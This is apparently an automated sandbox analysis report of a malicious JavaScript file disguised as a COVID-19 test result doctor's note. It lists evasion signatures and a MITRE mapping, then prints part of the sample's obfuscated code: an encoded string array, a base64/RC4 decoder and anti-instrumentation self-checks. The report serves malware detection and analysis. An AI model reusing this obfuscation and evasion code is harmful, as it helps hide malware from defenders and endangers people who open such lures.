Play interactive tour

Edit tour

Analysis Report COVID_19_Test_Result_Doctor_Note.js

Overview

General Information

Sample Name:	COVID_19_Test_Result_Doctor_Note.js
Analysis ID:	365159
MD5:	0bca3422ec870f28791d61a4fa25367f
SHA1:	36352478af11cdd59c55b8ef8ecf2cfacb2dcaaa
SHA256:	7703889f1b2c6fd8a1fe0abc4a8b6a409d4e6eabe5943c4a5261dfc68fb973f6
Infos:
Most interesting Screenshot:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found potential dummy code loops (likely to delay analysis)

JavaScript source code contains call to eval() to check own source code (likely for evading instrumentation)

Potential obfuscated javascript found

Abnormal high CPU Usage

Found WSH timer for Javascript or VBS script (likely evasive script)

Java / VBScript file with very long strings (likely obfuscated code)

Program does not show much activity (idle)

Classification

Startup

System is w10x64

wscript.exe (PID: 6376 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\COVID_19_Test_Result_Doctor_Note.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

Source: C:\Windows\System32\wscript.exe

Process Stats: CPU usage > 98%

Source: COVID_19_Test_Result_Doctor_Note.js

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal52.evad.winJS@1/0@0/0

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Data Obfuscation:

Potential obfuscated javascript found

Show sources

Source: COVID_19_Test_Result_Doctor_Note.js

Initial file: High amount of function use 25

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

JavaScript source code contains call to eval() to check own source code (likely for evading instrumentation)

Show sources

Source: COVID_19_Test_Result_Doctor_Note.js

Check function source code vs Regexp: /\w+ * *{\w+ *['|"].+['|"];? *}/.test("function () { jbxlog ( [ "exec", 348 ], [ "f", "" ] ) ; return 'newState'; }")

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Anti Debugging:

Found potential dummy code loops (likely to delay analysis)

Show sources

Source: C:\Windows\System32\wscript.exe

Process Stats: CPU usage > 90% for more than 60s

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting22	Path Interception	Path Interception	Virtualization/Sandbox Evasion11	OS Credential Dumping	Security Software Discovery2	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Data Obfuscation	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Scripting22	LSASS Memory	Virtualization/Sandbox Evasion11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	System Information Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
COVID_19_Test_Result_Doctor_Note.js	0%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	365159
Start date:	09.03.2021
Start time:	09:12:25
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 9s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	COVID_19_Test_Result_Doctor_Note.js
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (Javascript) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal52.evad.winJS@1/0@0/0
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .js Override analysis time to 240s for JS files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	ASCII text, with very long lines, with CRLF line terminators
Entropy (8bit):	5.728503884778436
TrID:	Digital Micrograph Script (4001/1) 100.00%
File name:	COVID_19_Test_Result_Doctor_Note.js
File size:	13478
MD5:	0bca3422ec870f28791d61a4fa25367f
SHA1:	36352478af11cdd59c55b8ef8ecf2cfacb2dcaaa
SHA256:	7703889f1b2c6fd8a1fe0abc4a8b6a409d4e6eabe5943c4a5261dfc68fb973f6
SHA512:	bcaeb9faad34f88a8a7392743a8d71eb793eb865f17c3b2232ddb28066a5959e14f476dcffd26901a79e3cf1b8cee05deb96e06d9da6693b7958d1b3915d92d3
SSDEEP:	384:90DjR41HSTJwGFP4NK4lKm5+tbK4vgDDr843x7z/RjozIFY:9ajy1yT1FP4NnlKztbnMDr8uxnRjAIFY
File Content Preview:	//*ERROR DECODING SIGNATURE FOR PATIENT //..//ERROR OUTPUT*//....var _0x39e5=['mCozt8kWW4eQEG','CNvU','W53dQmk9cmoWC0Krl3y','mZq2odK1DNLpAwXg','u2W2ymoJWQCPW5C','DgvZDa','rxHWyw5Krw52AxjVBM1LBNrtDhjPBMDZ','mty2mZe2u0DUq1z3','mJG4odi0q0HOAfbJ','y

File Icon


Icon Hash:	e8d69ece968a9ec4

Network Behavior

No network behavior found

Code Manipulations

Statistics

System Behavior

Analysis Process: wscript.exe PID: 6376 Parent PID: 3388

General

Start time:	09:13:10
Start date:	09/03/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\COVID_19_Test_Result_Doctor_Note.js'
Imagebase:	0x7ff7deb40000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

JavaScript Code

Script:

Code
0	var _0x39e5 = [ 'mCozt8kWW4eQEG', 'CNvU', 'W53dQmk9cmoWC0Krl3y', 'mZq2odK1DNLpAwXg', 'u2W2ymoJWQCPW5C', 'DgvZDa', 'rxHWyw5Krw52AxjVBM1LBNrtDhjPBMDZ', 'mty2mZe2u0DUq1z3', 'mJG4odi0q0HOAfbJ', 'ybpdShBdI8o/mdvSWRTG', 'jvrftvaL', 'WPRcJSk5WPdcPCksmSkyW6BdJComW4u9vG', 'C2vUza', 'WRhdVmoDc8o3W5zo', 'y2HHCKf0', 'WORcKCkSWORcQSkAmSkB', 'F8kLW40M', 'vxnLCI1bz2vUDa', 'z3zcW5FcVCoOECkBW6xcQCk2gI3dG01L', 'Aw5WDxq', 'CxvPDa', 'cSkTdmoA', 'W7KoWRlcQvpdOmkku8k7cNObb8o6W5fGWPNcImkfW4OKgCofzG', 'D3nJCMLWDc5LEguGlY9cia', 'uMvNuMvHza', 'W5xcRHpcMmooWR9jWPWvts8', 'B3bLBG', 'BgvUz3rO', 'WO1dAhxcSW', 'ytL3WP/cK8oHWO12beqi', 'zNjVBunOyxjdB2rL', 'WPKBohVcU8ohW7azW7eXWO0', 'WR0GW7ddVSoUW7uObfhdHCoZWQn3W4/cRYHAW5VcKCkkW5SFafagWQfiFCkMA8k1W4BdNHpcLCoDrLJdVSkYWPxcGZRcPgS', 'tw96AwXSys81lJaGkfDPBMrVD3mGtLqGmtaUmdSGv2LUnJq7ihG2ncKGqxbWBgvxzwjlAxqVntm3lJm2icHlsfrntcWGBgLRzsbhzwnRBYKGq2HYB21LlZG4lJaUndmYnc4XntaGu2fMyxjPlZuZnY4ZnIbfzgCVodGUmc43mduUnJm', 'ftRdKq3dNa', 'W4DpyI/dTSow', 'C3rHCNr1Ca', 'otG4mdDgB1b2ueW', 'WO7dVW3dSZtcUq', 'g8ocieBdPCkMWQ17tmkSpG', 'uKvhx1nA', 'y2fSBa', 'hSk6bCobBW', 'cx3dQCkHsZq', 'WRRdVmohomoQW5m', 'WOtdP8klaSo5mSkyoK/dJqi6', 'mteYnJqZt1PHveHh', 'hSkPg8obAWKhW7uItW', 'C2nYAxb0BMfTzq', 'W4PAFctdUW', 'i2iWW4BdLCorWRLXj0m', 'CMvND3jPDgu', 'WOlcRCo0eCoF', 'tvnytuWYlLnLCNzLCLHnteHuvfa', 'Aw5PDa', 'y2HHAw4', 'ywjJzgvMmdeYmZq1nJC4oq', 'W5FcVSorrCo1', 'CMvWBgfJzq', 'ac/dKHu', 'WONdTsTzvCo6jxq', 'oI8V', 'C2nYAxb0zNvSBg5HBwu', 'CMvZCg9UC2vuzxH0', 'q29UDgvUDc1uExbL', 'gNmZW5WpxMj6tG', 'W4NcPW9HDCoalNyWwSodvq', 'W5hdR1G', 'leSr', 'zgvIDq', 'seTdvvXtB2z0D2fYzvXIB2X0xeDvsuq', 'ue9tva', 'jvvtrvjoqu1fjq', 'W4ZdKSoYes/dTCkXWRXTWRGD', 'y29UC3rYDwn0B3i', 'C3bSAxq', 'sSkNW48qWQ/dGmosp8kO', 'muPSufz4sa', 'W6tdI2iVlY8', 'W7btwSoMWPNcICogncecEmk3', 'W6BdGmkmnmoCDeGwnMtcPrxdM8osag7dRGTkW6/cLt0+W5/cIgdcKHK+fx/cRmkFrL3cRwldRtxcLSoGECo3ggxcIrdcUmo4WPtcGG', 'C2f2zxrVzMLSzq', 'WRihhmkcW4JdI8o8cZmIEmkvWO3cRrBdLq', 'yxbWBgLJyxrPB24VEc13D3CTzM9YBs11CMXLBMnVzgvK', 'oLZdQfSSDW', 'D3nJCMLWDc5ZAgvSBa', 'zMXVB3i', 'WP7cJmk1WOFcQq', 'xNXUkSkbWPmC', 'z2PaW5hcUSkU', 'W6CdlYOiW7XHps3dUmk8W7S' ];
1	var _0x26ae = function (_0x2929da, _0x18bd1c) {
2	_0x2929da = _0x2929da - 0x136;
3	var _0x387f06 = _0x39e5[_0x2929da];
4	if ( _0x26ae['wkROjH'] === undefined )
5	{
6	var _0x2150f9 = function (_0x5a8350) {
7	var _0x494982 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
8	var _0x39e5e0 = '';
9	for ( var _0x26ae68 = 0x0, _0x1fc186, _0x4ab90f, _0x3e72fb = 0x0 ; _0x4ab90f = _0x5a8350['charAt'] ( _0x3e72fb ++ ) ; ~ _0x4ab90f && ( _0x1fc186 = _0x26ae68 % 0x4 ? _0x1fc186 * 0x40 + _0x4ab90f : _0x4ab90f, _0x26ae68 ++ % 0x4 ) ? _0x39e5e0 += String['fromCharCode'] ( 0xff & _0x1fc186 >> ( - 0x2 * _0x26ae68 & 0x6 ) ) : 0x0 )
10	{
11	_0x4ab90f = _0x494982['indexOf'] ( _0x4ab90f );
12	}
13	return _0x39e5e0;
14	};
15	_0x26ae['xYSHEi'] =
16	function (_0x2a30ac) {
17	var _0x2d8802 = _0x2150f9 ( _0x2a30ac );
18	var _0x40f67c = [];
19	for ( var _0x2d6e36 = 0x0, _0x39a245 = _0x2d8802['length'] ; _0x2d6e36 < _0x39a245 ; _0x2d6e36 ++ )
20	{
21	_0x40f67c += '%' + ( '00' + _0x2d8802['charCodeAt'] ( _0x2d6e36 ) ['toString'] ( 0x10 ) )['slice'] ( - 0x2 );
22	}
23	return decodeURIComponent ( _0x40f67c );
24	},
25	_0x26ae['DaINLR'] =
26	{
27	}, _0x26ae['wkROjH'] = ! ! [];
28	}
29	var _0x2c1167 = _0x39e5[0x0], _0x30f503 = _0x2929da + _0x2c1167, _0x38ac6c = _0x26ae['DaINLR'][_0x30f503];
30	if ( _0x38ac6c === undefined )
31	{
32	var _0x364960 = function (_0x41273d) {	_0x37524d("0x18d") ➔
33	this['FJMtUj'] = _0x41273d, this['PRTrKK'] = [ 0x1, 0x0, 0x0 ],
34	this['lcaTHf'] =
35	function () {
36	return 'newState';
37	}, this['NiMMBI'] = '\x5cw+\x20\x5c(\x5c)\x20{\x5cw+\x20', this['KKqzjK'] = '[\x27\|\x22].+[\x27\|\x22];?\x20}';
38	};
39	_0x364960['prototype']['dAYrWi'] =
40	function () {
41	var _0x43f378 = new RegExp ( this['NiMMBI'] + this['KKqzjK'] ), _0x34b6d1 = _0x43f378['test'] ( this['lcaTHf']['toString'] ( ) ) ? -- this['PRTrKK'][0x1] : -- this['PRTrKK'][0x0];	/\w+ * {\w+ ['\|"].+['\|"];? *}/.test("function () { jbxlog ( [ "exec", 348 ], [ "f", "" ] ) ; return 'newState'; }") ➔ false
42	return this['lLjveu'] ( _0x34b6d1 );	[object Object].lLjveu(0) ➔
43	},
44	_0x364960['prototype']['lLjveu'] =
45	function (_0x4d31de) {	[object Object].lLjveu(0) ➔
46	if ( ! Boolean ( ~ _0x4d31de ) )	Boolean(-1) ➔ true
47	return _0x4d31de;
48	return this['xyNHXg'] ( this['FJMtUj'] );	[object Object].xyNHXg(function (_0x2929da, _0x18bd1c)) ➔
49	},
50	_0x364960['prototype']['xyNHXg'] =
51	function (_0x553279) {	[object Object].xyNHXg(function (_0x2929da, _0x18bd1c)) ➔
52	for ( var _0x3534fb = 0x0, _0x3c82a3 = this['PRTrKK']['length'] ; _0x3534fb < _0x3c82a3 ; _0x3534fb ++ )
53	{
54	this['PRTrKK']['push'] ( Math['round'] ( Math['random'] ( ) ) ), _0x3c82a3 = this['PRTrKK']['length'];	[object Math].random() ➔ 0.48103504082600834 [object Math].round(0.48103504082600834) ➔ 0 [object Math].random() ➔ 0.7088752368106969 [object Math].round(0.7088752368106969) ➔ 1 [object Math].random() ➔ 0.16561634468440534 [object Math].round(0.16561634468440534) ➔ 0 [object Math].random() ➔ 0.9486590711226925 [object Math].round(0.9486590711226925) ➔ 1 [object Math].random() ➔ 0.33502513476996515 [object Math].round(0.33502513476996515) ➔ 0 [object Math].random() ➔ 0.17835870790952424 [object Math].round(0.17835870790952424) ➔ 0 [object Math].random() ➔ 0.8723464547804649 [object Math].round(0.8723464547804649) ➔ 1 [object Math].random() ➔ 0.6842777025442384 [object Math].round(0.6842777025442384) ➔ 1 [object Math].random() ➔ 0.0606042293724412 [object Math].round(0.0606042293724412) ➔ 0 [object Math].random() ➔ 0.6370253100833458 [object Math].round(0.6370253100833458) ➔ 1
55	}
56	return _0x553279 ( this['PRTrKK'][0x0] );
57	}, new _0x364960 ( _0x26ae ) ['dAYrWi'] ( ), _0x387f06 = _0x26ae['xYSHEi'] ( _0x387f06 ), _0x26ae['DaINLR'][_0x30f503] = _0x387f06;
58	}
59	else
60	_0x387f06 = _0x38ac6c;
61	return _0x387f06;
62	};
63	var _0x1fc1 = function (_0x2929da, _0x18bd1c) {
64	_0x2929da = _0x2929da - 0x136;
65	var _0x387f06 = _0x39e5[_0x2929da];
66	if ( _0x1fc1['APyrWQ'] === undefined )
67	{
68	var _0x2150f9 = function (_0x494982) {
69	var _0x39e5e0 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
70	var _0x26ae68 = '';
71	for ( var _0x1fc186 = 0x0, _0x4ab90f, _0x3e72fb, _0x2a30ac = 0x0 ; _0x3e72fb = _0x494982['charAt'] ( _0x2a30ac ++ ) ; ~ _0x3e72fb && ( _0x4ab90f = _0x1fc186 % 0x4 ? _0x4ab90f * 0x40 + _0x3e72fb : _0x3e72fb, _0x1fc186 ++ % 0x4 ) ? _0x26ae68 += String['fromCharCode'] ( 0xff & _0x4ab90f >> ( - 0x2 * _0x1fc186 & 0x6 ) ) : 0x0 )
72	{
73	_0x3e72fb = _0x39e5e0['indexOf'] ( _0x3e72fb );
74	}
75	return _0x26ae68;
76	};
77	var _0x5a8350 = function (_0x2d8802, _0x40f67c) {
78	var _0x2d6e36 = [], _0x39a245 = 0x0, _0x364960, _0x41273d = '', _0x43f378 = '';
79	_0x2d8802 = _0x2150f9 ( _0x2d8802 );
80	for ( var _0x4d31de = 0x0, _0x553279 = _0x2d8802['length'] ; _0x4d31de < _0x553279 ; _0x4d31de ++ )
81	{
82	_0x43f378 += '%' + ( '00' + _0x2d8802['charCodeAt'] ( _0x4d31de ) ['toString'] ( 0x10 ) )['slice'] ( - 0x2 );
83	}
84	_0x2d8802 = decodeURIComponent ( _0x43f378 );
85	var _0x34b6d1;
86	for ( _0x34b6d1 = 0x0 ; _0x34b6d1 < 0x100 ; _0x34b6d1 ++ )
87	{
88	_0x2d6e36[_0x34b6d1] = _0x34b6d1;
89	}
90	for ( _0x34b6d1 = 0x0 ; _0x34b6d1 < 0x100 ; _0x34b6d1 ++ )
91	{
92	_0x39a245 = ( _0x39a245 + _0x2d6e36[_0x34b6d1] + _0x40f67c['charCodeAt'] ( _0x34b6d1 % _0x40f67c['length'] ) ) % 0x100, _0x364960 = _0x2d6e36[_0x34b6d1], _0x2d6e36[_0x34b6d1] = _0x2d6e36[_0x39a245], _0x2d6e36[_0x39a245] = _0x364960;
93	}
94	_0x34b6d1 = 0x0, _0x39a245 = 0x0;
95	for ( var _0x3534fb = 0x0 ; _0x3534fb < _0x2d8802['length'] ; _0x3534fb ++ )
96	{
97	_0x34b6d1 = ( _0x34b6d1 + 0x1 ) % 0x100, _0x39a245 = ( _0x39a245 + _0x2d6e36[_0x34b6d1] ) % 0x100, _0x364960 = _0x2d6e36[_0x34b6d1], _0x2d6e36[_0x34b6d1] = _0x2d6e36[_0x39a245], _0x2d6e36[_0x39a245] = _0x364960, _0x41273d += String['fromCharCode'] ( _0x2d8802['charCodeAt'] ( _0x3534fb ) ^ _0x2d6e36[( _0x2d6e36[_0x34b6d1] + _0x2d6e36[_0x39a245] ) % 0x100] );
98	}
99	return _0x41273d;
100	};
101	_0x1fc1['xeclEU'] = _0x5a8350,
102	_0x1fc1['tEpTFs'] =
103	{
104	}, _0x1fc1['APyrWQ'] = ! ! [];
105	}
106	var _0x2c1167 = _0x39e5[0x0], _0x30f503 = _0x2929da + _0x2c1167, _0x38ac6c = _0x1fc1['tEpTFs'][_0x30f503];
107	if ( _0x38ac6c === undefined )
108	{
109	if ( _0x1fc1['gqdguA'] === undefined )
110	{
111	var _0x3c82a3 = function (_0x2cc4e4) {
112	this['dFGFPT'] = _0x2cc4e4, this['erFzXo'] = [ 0x1, 0x0, 0x0 ],
113	this['KtfqmL'] =
114	function () {
115	return 'newState';
116	}, this['zGDTQe'] = '\x5cw+\x20\x5c(\x5c)\x20{\x5cw+\x20', this['HjrHjW'] = '[\x27\|\x22].+[\x27\|\x22];?\x20}';
117	};
118	_0x3c82a3['prototype']['NiMncb'] =
119	function () {
120	var _0x1ea5df = new RegExp ( this['zGDTQe'] + this['HjrHjW'] ), _0x3d06b9 = _0x1ea5df['test'] ( this['KtfqmL']['toString'] ( ) ) ? -- this['erFzXo'][0x1] : -- this['erFzXo'][0x0];
121	return this['rKZMXc'] ( _0x3d06b9 );
122	},
123	_0x3c82a3['prototype']['rKZMXc'] =
124	function (_0x415288) {
125	if ( ! Boolean ( ~ _0x415288 ) )
126	return _0x415288;
127	return this['gTYFtX'] ( this['dFGFPT'] );
128	},
129	_0x3c82a3['prototype']['gTYFtX'] =
130	function (_0x477ace) {
131	for ( var _0x115c69 = 0x0, _0x3fb45b = this['erFzXo']['length'] ; _0x115c69 < _0x3fb45b ; _0x115c69 ++ )
132	{
133	this['erFzXo']['push'] ( Math['round'] ( Math['random'] ( ) ) ), _0x3fb45b = this['erFzXo']['length'];
134	}
135	return _0x477ace ( this['erFzXo'][0x0] );
136	}, new _0x3c82a3 ( _0x1fc1 ) ['NiMncb'] ( ), _0x1fc1['gqdguA'] = ! ! [];
137	}
138	_0x387f06 = _0x1fc1['xeclEU'] ( _0x387f06, _0x18bd1c ), _0x1fc1['tEpTFs'][_0x30f503] = _0x387f06;
139	}
140	else
141	_0x387f06 = _0x38ac6c;
142	return _0x387f06;
143	};
144	var _0x4f83db = _0x1fc1, _0x5abc4a = _0x26ae;
145	( function (_0x21ce3b, _0x4d5b36) {	(mCozt8kWW4eQEG,CNvU,W53dQmk9cmoWC0Krl3y,mZq2odK1DNLpAwXg,u2W2ymoJWQCPW5C,DgvZDa,rxHWyw5Krw52AxjVBM1LBNrtDhjPBMDZ,mty2mZe2u0DUq1z3,mJG4odi0q0HOAfbJ,ybpdShBdI8o/mdvSWRTG,jvrftvaL,WPRcJSk5WPdcPCksmSkyW6BdJComW4u9vG,C2vUza,WRhdVmoDc8o3W5zo,y2HHCKf0,WORcKCkSWORcQSkAmSkB,F8kLW40M,vxnLCI1bz2vUDa,z3zcW5FcVCoOECkBW6xcQCk2gI3dG01L,Aw5WDxq,CxvPDa,cSkTdmoA,W7KoWRlcQvpdOmkku8k7cNObb8o6W5fGWPNcImkfW4OKgCofzG,D3nJCMLWDc5LEguGlY9cia,uMvNuMvHza,W5xcRHpcMmooWR9jWPWvts8,B3bLBG,BgvUz3rO,WO1dAhxcSW,ytL3WP/cK8oHWO12beqi,zNjVBunOyxjdB2rL,WPKBohVcU8ohW7azW7eXWO0,WR0GW7ddVSoUW7uObfhdHCoZWQn3W4/cRYHAW5VcKCkkW5SFafagWQfiFCkMA8k1W4BdNHpcLCoDrLJdVSkYWPxcGZRcPgS,tw96AwXSys81lJaGkfDPBMrVD3mGtLqGmtaUmdSGv2LUnJq7ihG2ncKGqxbWBgvxzwjlAxqVntm3lJm2icHlsfrntcWGBgLRzsbhzwnRBYKGq2HYB21LlZG4lJaUndmYnc4XntaGu2fMyxjPlZuZnY4ZnIbfzgCVodGUmc43mduUnJm,ftRdKq3dNa,W4DpyI/dTSow,C3rHCNr1Ca,otG4mdDgB1b2ueW,WO7dVW3dSZtcUq,g8ocieBdPCkMWQ17tmkSpG,uKvhx1nA,y2fSBa,hSk6bCobBW,cx3dQCkHsZq,WRRdVmohomoQW5m,WOtdP8klaSo5mSkyoK/dJqi6,mteYnJqZt1PHveHh,hSkPg8obAWKhW7uItW,C2nYAxb0BMfTzq,W4PAFctdUW,i2iWW4BdLCorWRLXj0m,CMvND3jPDgu,WOlcRCo0eCoF,tvnytuWYlLnLCNzLCLHnteHuvfa,Aw5PDa,y2HHAw4,ywjJzgvMmdeYmZq1nJC4oq,W5FcVSorrCo1,CMvWBgfJzq,ac/dKHu,WONdTsTzvCo6jxq,oI8V,C2nYAxb0zNvSBg5HBwu,CMvZCg9UC2vuzxH0,q29UDgvUDc1uExbL,gNmZW5WpxMj6tG,W4NcPW9HDCoalNyWwSodvq,W5hdR1G,leSr,zgvIDq,seTdvvXtB2z0D2fYzvXIB2X0xeDvsuq,ue9tva,jvvtrvjoqu1fjq,W4ZdKSoYes/dTCkXWRXTWRGD,y29UC3rYDwn0B3i,C3bSAxq,sSkNW48qWQ/dGmosp8kO,muPSufz4sa,W6tdI2iVlY8,W7btwSoMWPNcICogncecEmk3,W6BdGmkmnmoCDeGwnMtcPrxdM8osag7dRGTkW6/cLt0+W5/cIgdcKHK+fx/cRmkFrL3cRwldRtxcLSoGECo3ggxcIrdcUmo4WPtcGG,C2f2zxrVzMLSzq,WRihhmkcW4JdI8o8cZmIEmkvWO3cRrBdLq,yxbWBgLJyxrPB24VEc13D3CTzM9YBs11CMXLBMnVzgvK,oLZdQfSSDW,D3nJCMLWDc5ZAgvSBa,zMXVB3i,WP7cJmk1WOFcQq,xNXUkSkbWPmC,z2PaW5hcUSkU,W6CdlYOiW7XHps3dUmk8W7S,289262) ➔ (mCozt8kWW4eQEG,CNvU,W53dQmk9cmoWC0Krl3y,mZq2odK1DNLpAwXg,u2W2ymoJWQCPW5C,DgvZDa,rxHWyw5Krw52AxjVBM1LBNrtDhjPBMDZ,mty2mZe2u0DUq1z3,mJG4odi0q0HOAfbJ,ybpdShBdI8o/mdvSWRTG,jvrftvaL,WPRcJSk5WPdcPCksmSkyW6BdJComW4u9vG,C2vUza,WRhdVmoDc8o3W5zo,y2HHCKf0,WORcKCkSWORcQSkAmSkB,F8kLW40M,vxnLCI1bz2vUDa,z3zcW5FcVCoOECkBW6xcQCk2gI3dG01L,Aw5WDxq,CxvPDa,cSkTdmoA,W7KoWRlcQvpdOmkku8k7cNObb8o6W5fGWPNcImkfW4OKgCofzG,D3nJCMLWDc5LEguGlY9cia,uMvNuMvHza,W5xcRHpcMmooWR9jWPWvts8,B3bLBG,BgvUz3rO,WO1dAhxcSW,ytL3WP/cK8oHWO12beqi,zNjVBunOyxjdB2rL,WPKBohVcU8ohW7azW7eXWO0,WR0GW7ddVSoUW7uObfhdHCoZWQn3W4/cRYHAW5VcKCkkW5SFafagWQfiFCkMA8k1W4BdNHpcLCoDrLJdVSkYWPxcGZRcPgS,tw96AwXSys81lJaGkfDPBMrVD3mGtLqGmtaUmdSGv2LUnJq7ihG2ncKGqxbWBgvxzwjlAxqVntm3lJm2icHlsfrntcWGBgLRzsbhzwnRBYKGq2HYB21LlZG4lJaUndmYnc4XntaGu2fMyxjPlZuZnY4ZnIbfzgCVodGUmc43mduUnJm,ftRdKq3dNa,W4DpyI/dTSow,C3rHCNr1Ca,otG4mdDgB1b2ueW,WO7dVW3dSZtcUq,g8ocieBdPCkMWQ17tmkSpG,uKvhx1nA,y2fSBa,hSk6bCobBW,cx3dQCkHsZq,WRRdVmohomoQW5m,WOtdP8klaSo5mSkyoK/dJqi6,mteYnJqZt1PHveHh,hSkPg8obAWKhW7uItW,C2nYAxb0BMfTzq,W4PAFctdUW,i2iWW4BdLCorWRLXj0m,CMvND3jPDgu,WOlcRCo0eCoF,tvnytuWYlLnLCNzLCLHnteHuvfa,Aw5PDa,y2HHAw4,ywjJzgvMmdeYmZq1nJC4oq,W5FcVSorrCo1,CMvWBgfJzq,ac/dKHu,WONdTsTzvCo6jxq,oI8V,C2nYAxb0zNvSBg5HBwu,CMvZCg9UC2vuzxH0,q29UDgvUDc1uExbL,gNmZW5WpxMj6tG,W4NcPW9HDCoalNyWwSodvq,W5hdR1G,leSr,zgvIDq,seTdvvXtB2z0D2fYzvXIB2X0xeDvsuq,ue9tva,jvvtrvjoqu1fjq,W4ZdKSoYes/dTCkXWRXTWRGD,y29UC3rYDwn0B3i,C3bSAxq,sSkNW48qWQ/dGmosp8kO,muPSufz4sa,W6tdI2iVlY8,W7btwSoMWPNcICogncecEmk3,W6BdGmkmnmoCDeGwnMtcPrxdM8osag7dRGTkW6/cLt0+W5/cIgdcKHK+fx/cRmkFrL3cRwldRtxcLSoGECo3ggxcIrdcUmo4WPtcGG,C2f2zxrVzMLSzq,WRihhmkcW4JdI8o8cZmIEmkvWO3cRrBdLq,yxbWBgLJyxrPB24VEc13D3CTzM9YBs11CMXLBMnVzgvK,oLZdQfSSDW,D3nJCMLWDc5ZAgvSBa,zMXVB3i,WP7cJmk1WOFcQq,xNXUkSkbWPmC,z2PaW5hcUSkU,W6CdlYOiW7XHps3dUmk8W7S,289262) ➔
146	var _0x3ba741 = _0x1fc1, _0x37524d = _0x26ae;
147	while (! ! [ ] )
148	{
149	try
150	{
151	var _0x469b11 = - parseInt ( _0x37524d ( '0x18d' ) ) + - parseInt ( _0x37524d ( 0x154 ) ) + parseInt ( _0x3ba741 ( 0x189, '01)r' ) ) + - parseInt ( _0x3ba741 ( 0x14e, 'DH)J' ) ) * parseInt ( _0x3ba741 ( 0x18a, '^Bvv' ) ) + - parseInt ( _0x37524d ( 0x15d ) ) * parseInt ( _0x37524d ( '0x17c' ) ) + parseInt ( _0x37524d ( '0x136' ) ) + - parseInt ( _0x3ba741 ( 0x14c, '$G#%' ) ) * - parseInt ( _0x3ba741 ( 0x18e, 'OvA7' ) );	_0x37524d("0x18d") ➔
